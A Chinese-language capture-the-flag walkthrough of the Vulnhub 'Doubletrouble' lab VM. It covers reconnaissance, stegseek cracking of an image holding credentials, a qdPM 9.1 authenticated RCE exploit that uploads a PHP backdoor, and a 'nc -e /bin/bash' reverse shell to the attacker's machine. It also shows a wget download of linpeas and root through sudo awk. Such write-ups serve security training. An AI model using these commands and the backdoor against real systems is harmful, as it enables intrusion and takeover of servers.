Vulnhub之Doubletrouble靶机详细解题过程
Doubletrouble
作者:Jason_huawen
目标主机基本信息
名称:doubletrouble: 1
地址:https://www.vulnhub.com/entry/doubletrouble-1,743/
识别目标主机IP地址
──(kali㉿kali)-[~/Vulnhub/Doubletrouble]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.119.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:2b:cc:72 1 60 PCS Systemtechnik GmbH
192.168.56.188 08:00:27:dd:2c:b4 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带netdiscover工具识别目标主机IP地址为192.168.56.188
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Doubletrouble]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.188 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-18 04:32 EST
Nmap scan report for bogon (192.168.56.188)
Host is up (0.000068s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 6a:fe:d6:17:23:cb:90:79:2b:b1:2d:37:53:97:46:58 (RSA)
| 256 5b:c4:68:d1:89:59:d7:48:b0:96:f3:11:87:1c:08:ac (ECDSA)
|_ 256 61:39:66:88:1d:8f:f1:d0:40:61:1e:99:c5:1a:1f:f4 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: qdPM | Login
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:DD:2C:B4 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.92 seconds
NMAP扫描结果表明目标主机有2个开放端口:22(SSH服务)、80(HTTP服务)
Get Access
由于目标主机的SSH服务版本(7.9)没有可利用的漏洞,因此可以从目标主机的80端口着手:
┌──(kali㉿kali)-[~/Vulnhub/Doomsday_Device]
└─$ curl http://192.168.56.188/robots.txt
#User-agent: *
#Disallow:
┌──(kali㉿kali)-[~/Vulnhub/Doomsday_Device]
└─$ gobuster dir -u http://192.168.56.188 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.188
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/18 04:37:28 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 317] [--> http://192.168.56.188/images/]
/uploads (Status: 301) [Size: 318] [--> http://192.168.56.188/uploads/]
/css (Status: 301) [Size: 314] [--> http://192.168.56.188/css/]
/template (Status: 301) [Size: 319] [--> http://192.168.56.188/template/]
/core (Status: 301) [Size: 315] [--> http://192.168.56.188/core/]
/install (Status: 301) [Size: 318] [--> http://192.168.56.188/install/]
/js (Status: 301) [Size: 313] [--> http://192.168.56.188/js/]
/sf (Status: 301) [Size: 313] [--> http://192.168.56.188/sf/]
/secret (Status: 301) [Size: 317] [--> http://192.168.56.188/secret/]
/backups (Status: 301) [Size: 318] [--> http://192.168.56.188/backups/]
/batch (Status: 301) [Size: 316] [--> http://192.168.56.188/batch/]
/server-status (Status: 403) [Size: 279]
Progress: 217305 / 220561 (98.52%)===============================================================
2022/11/18 04:37:57 Finished
===============================================================
Gobuster工具扫描出来不少的目录,其中/secret目录尤其引人注目,看一下该目录有什么内容?
┌──(kali㉿kali)-[~/Vulnhub/Doomsday_Device]
└─$ curl http://192.168.56.188/secret/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /secret</title>
</head>
<body>
<h1>Index of /secret</h1>
<table>
<tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
<tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a></td><td> </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/image2.gif" alt="[IMG]"></td><td><a href="doubletrouble.jpg">doubletrouble.jpg</a></td><td align="right">2021-09-11 10:39 </td><td align="right"> 81K</td><td> </td></tr>
<tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.4.38 (Debian) Server at 192.168.56.188 Port 80</address>
</body></html>
访问该目录,返回页面中含有图片的链接,将该图片下载到Kali Linux本地:
┌──(kali㉿kali)-[~/Vulnhub/Doubletrouble]
└─$ steghide extract -sf doubletrouble.jpg
Enter passphrase:
┌──(kali㉿kali)-[~/Vulnhub/Doubletrouble]
└─$ stegseek doubletrouble.jpg /usr/share/wordlists/rockyou.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: "92camaro"
[i] Original filename: "creds.txt".
[i] Extracting to "doubletrouble.jpg.out".
┌──(kali㉿kali)-[~/Vulnhub/Doubletrouble]
└─$ ls
doubletrouble.jpg doubletrouble.jpg.out nmap_full_scan
┌──(kali㉿kali)-[~/Vulnhub/Doubletrouble]
└─$ cat doubletrouble.jpg.out
otisrush@localhost.com
otis666
下载到Kali Linux本地后用steghide工具打开看有无隐藏内容,发现有口令保护,没关系用steseek破解,成功得到其口令,并提取出该图片的内容。
看内容就是邮箱地址和密码,联想到访问80端口,返回页面就是登录页面,那么这会不是是登录的用户名和密码呢?试一下:
发现可以成功登录!
┌──(kali㉿kali)-[~/Vulnhub/Doubletrouble]
└─$ searchsploit qdpm
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
qdPM 7 - Arbitrary File upload | php/webapps/19154.py
qdPM 7.0 - Arbitrary '.PHP' File Upload (Metasploit) | php/webapps/21835.rb
qdPM 9.1 - 'cfg[app_app_name]' Persistent Cross-Site Scripting | php/webapps/48486.txt
qdPM 9.1 - 'filter_by' SQL Injection | php/webapps/45767.txt
qdPM 9.1 - 'search[keywords]' Cross-Site Scripting | php/webapps/46399.txt
qdPM 9.1 - 'search_by_extrafields[]' SQL Injection | php/webapps/46387.txt
qdPM 9.1 - 'type' Cross-Site Scripting | php/webapps/46398.txt
qdPM 9.1 - Arbitrary File Upload | php/webapps/48460.txt
qdPM 9.1 - Remote Code Execution | php/webapps/47954.py
qdPM 9.1 - Remote Code Execution (RCE) (Authenticated) | php/webapps/50175.py
qdPM 9.1 - Remote Code Execution (RCE) (Authenticated) (v2) | php/webapps/50944.py
qdPM 9.2 - Cross-site Request Forgery (CSRF) | php/webapps/50854.txt
qdPM 9.2 - Password Exposure (Unauthenticated) | php/webapps/50176.txt
qdPM < 9.1 - Remote Code Execution | multiple/webapps/48146.py
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
这个web应用竟然有这么多漏洞,而目标主机的版本是9.1,选择远程执行漏洞进行尝试:
┌──(kali㉿kali)-[~/Vulnhub/Doubletrouble]
└─$ ls
50854.txt 50944.py doubletrouble.jpg doubletrouble.jpg.out nmap_full_scan
┌──(kali㉿kali)-[~/Vulnhub/Doubletrouble]
└─$ mv 50944.py exploit.py
┌──(kali㉿kali)-[~/Vulnhub/Doubletrouble]
└─$ cat exploit.py
# Exploit Title: qdPM 9.1 - Remote Code Execution (RCE) (Authenticated)
# Google Dork: intitle:qdPM 9.1. Copyright © 2020 qdpm.net
# Date: 2021-08-03
# Original Exploit Author: Rishal Dwivedi (Loginsoft)
# Original ExploitDB ID: 47954 (https://www.exploit-db.com/exploits/47954)
# Exploit Author: Leon Trappett (thepcn3rd)
# Vendor Homepage: http://qdpm.net/
# Software Link: http://qdpm.net/download-qdpm-free-project-management
# Version: <=1.9.1
# Tested on: Ubuntu Server 20.04 (Python 3.9.2)
# CVE : CVE-2020-7246
# Exploit written in Python 3.9.2
# Tested Environment - Ubuntu Server 20.04 LTS
# Path Traversal + Remote Code Execution
# Exploit modification: RedHatAugust
┌──(kali㉿kali)-[~/Vulnhub/Doubletrouble]
└─$ python exploit.py -url http://192.168.56.188/ -u otisrush@localhost.com -p otis666
You are not able to use the designated admin account because they do not have a myAccount page.
The DateStamp is 2022-11-18 03:47
Backdoor uploaded at - > http://192.168.56.188/uploads/users/466213-backdoor.php?cmd=whoami
似乎应将backdoor上传了
┌──(kali㉿kali)-[~/Vulnhub/Doubletrouble]
└─$ curl http://192.168.56.188/uploads/users/466213-backdoor.php?cmd=whoami
<pre>www-data
</pre>
成功得到执行,接下来就要看如何得到shell
将cmd的值换成nc以试图建立shell
http://192.168.56.188/uploads/users/466213-backdoor.php?cmd=nc%20-e%20/bin/bash%20192.168.56.137%205555
这样Kali Linux成功得到了目标主机反弹回来的shell
┌──(kali㉿kali)-[~/Vulnhub/Doubletrouble]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.188] 48732
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@doubletrouble:/var/www/html/uploads/users$
提权
在Kali Linux利用Python启动HTTP服务,将linpeas.sh脚本上传至目标主机的/tmp目录下,修改权限,并执行该脚本:
www-data@doubletrouble:/var/www/html/install$ cd /tmp
cd /tmp
www-data@doubletrouble:/tmp$ wget http://192.168.56.137:8000/linpeas.sh
wget http://192.168.56.137:8000/linpeas.sh
--2022-11-18 03:55:28-- http://192.168.56.137:8000/linpeas.sh
Connecting to 192.168.56.137:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 827827 (808K) [text/x-sh]
Saving to: 'linpeas.sh'
linpeas.sh 100%[===================>] 808.42K --.-KB/s in 0.006s
2022-11-18 03:55:28 (138 MB/s) - 'linpeas.sh' saved [827827/827827]
www-data@doubletrouble:/tmp$ ls
ls
linpeas.sh
www-data@doubletrouble:/tmp$ chmod +x linpeas.sh
chmod +x linpeas.sh
www-data@doubletrouble:/tmp$ ./linpeas.sh
./linpeas.sh
▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄ ▄▄▄ ▄▄▄▄▄ ▄▄▄
▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄ ▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▀▀▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀
▀▀▀▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▀▀
▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀
/---------------------------------------------------------------------------------\
| Do you like PEASS? |
|---------------------------------------------------------------------------------|
| Get the latest version : https://github.com/sponsors/carlospolop |
| Follow on Twitter : @carlospolopm |
| Respect on HTB : SirBroccoli |
|---------------------------------------------------------------------------------|
| Thank you! |
\---------------------------------------------------------------------------------/
linpeas-ng by carlospolop
(省略)
Linpeas.sh脚本运行结果其中这部分引起我们的注意:
╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
Matching Defaults entries for www-data on doubletrouble:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on doubletrouble:
(ALL : ALL) NOPASSWD: /usr/bin/awk
表明www-data,也就是目前我们拥有的用户权限无需密码可以执行root的awk,这样就可以实现提权,通过查询GTFOBINS网站,找到相应的方法,实现提权
# id
id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
cd /root
# ls -alh
ls -alh
total 395M
drwx------ 2 root root 4.0K Sep 11 2021 .
drwxr-xr-x 18 root root 4.0K Dec 17 2020 ..
-rw------- 1 root root 46 Sep 11 2021 .bash_history
-rw-r--r-- 1 root root 395M Sep 11 2021 doubletrouble.ova
成功实现了提权!!!
STRIVE FOR PROGRESS,NOT FOR PERFECTION
浙公网安备 33010602011771号